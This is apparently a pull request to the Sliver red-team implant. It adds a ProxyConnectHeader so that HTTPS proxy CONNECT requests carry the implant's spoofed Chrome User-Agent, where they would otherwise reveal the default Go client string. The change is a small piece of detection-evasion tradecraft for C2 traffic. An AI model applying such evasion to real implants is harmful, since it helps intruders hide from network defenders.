### PR TITLE
fix: set ProxyConnectHeader to prevent UA leak on proxy CONNECT

### DIFF
--- a/implant/sliver/transports/httpclient/gohttp.go
+++ b/implant/sliver/transports/httpclient/gohttp.go
@@ -62,6 +62,9 @@ func GoHTTPDriver(origin string, secure bool, opts *HTTPOptions) (HTTPDriver, er
 			TLSClientConfig:     tlsConfig,
 		}
 	}
+	transport.ProxyConnectHeader = http.Header{
+		"User-Agent": []string{userAgent},
+	}
 	client := &http.Client{
 		Jar:       cookieJar(),
 		Timeout:   opts.NetTimeout,


### PR DESCRIPTION
Fixes #1775. The implant leaks Go-http-client User-Agent on HTTPS proxy CONNECT requests instead of using the generated Chrome UA. Added ProxyConnectHeader to http.Transport.